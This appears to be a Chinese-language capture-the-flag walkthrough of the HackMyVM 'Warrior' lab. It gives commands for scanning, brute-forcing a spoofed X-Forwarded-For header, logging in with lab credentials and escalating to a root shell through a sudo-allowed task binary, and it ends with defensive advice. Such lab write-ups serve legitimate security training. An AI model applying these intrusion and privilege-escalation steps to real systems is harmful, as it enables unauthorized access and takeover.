HackMyVM系列2——Warrior靶机渗透测试教学文档

1. 靶机概述

Warrior是HackMyVM系列中的一台中等难度靶机，主要考察信息收集、HTTP头伪造和SUID提权等技术点。本教学文档将详细讲解渗透测试全过程。

2. 信息收集阶段

2.1 网络扫描

首先使用netdiscover进行主机发现：

netdiscover -r 192.168.56.0/24

发现目标IP为192.168.56.127后，进行详细端口扫描：

nmap -sV -Pn -sC 192.168.56.127

2.2 Web服务枚举

Nmap扫描可能会发现HTTP服务，尝试访问：

http://192.168.56.127/

检查常见目录如：

http://192.168.56.127/internal.php

3. MAC地址伪造访问

发现internal.php需要特定MAC地址才能访问，进行MAC地址爆破：

3.1 伪造MAC地址

使用Burp Suite或curl工具，从00:00:00:00:00:00到00:00:00:00:00:ff依次尝试：

for i in {0..255}; do 
  mac=$(printf "00:00:00:00:00:%02x" $i)
  curl -H "X-Forwarded-For: $mac" http://192.168.56.127/internal.php -v
done

3.2 成功访问

当使用MAC地址00:00:00:00:00:af时成功获取内容：

curl -H "X-Forwarded-For: 00:00:00:00:00:af" http://192.168.56.127/internal.php

获取到凭证：

用户名: bro
密码: Zurviv0r1

4. SSH登录

使用获取的凭证登录SSH：

ssh bro@192.168.56.127
密码: Zurviv0r1

5. 权限提升

5.1 SUID查找

查找具有SUID权限的文件：

find / -perm -u=s -type f 2>/dev/null

5.2 利用sudo提权

发现系统没有直接安装sudo，但存在/usr/sbin/sudo：

/usr/sbin/sudo -l

发现可以利用task命令执行：

/usr/sbin/sudo /usr/bin/task execute /bin/sh

5.3 获取root权限

执行上述命令后获得root shell：

whoami  # 确认当前为root

6. 关键点总结

1. MAC地址伪造：靶机通过检查X-Forwarded-For头中的MAC地址进行访问控制

2. 凭证获取：通过MAC地址爆破获取SSH凭证

3. 非标准sudo路径：系统没有默认安装sudo，需要使用完整路径/usr/sbin/sudo

4. task命令提权：利用sudo权限执行task命令获取root shell

7. 防御建议

1. 避免在HTTP头中实现敏感访问控制
2. 使用强密码并定期更换
3. 限制SUID权限的二进制文件
4. 监控sudo权限配置
5. 保持系统更新，移除不必要的特权程序

8. 扩展思考

1. 如何自动化MAC地址爆破过程？
2. 如果task命令被限制执行shell，还有哪些提权方法？
3. 如何检测系统是否存在类似的非标准sudo配置？

通过本靶机的学习，可以掌握信息收集、HTTP头伪造和SUID提权等渗透测试关键技术。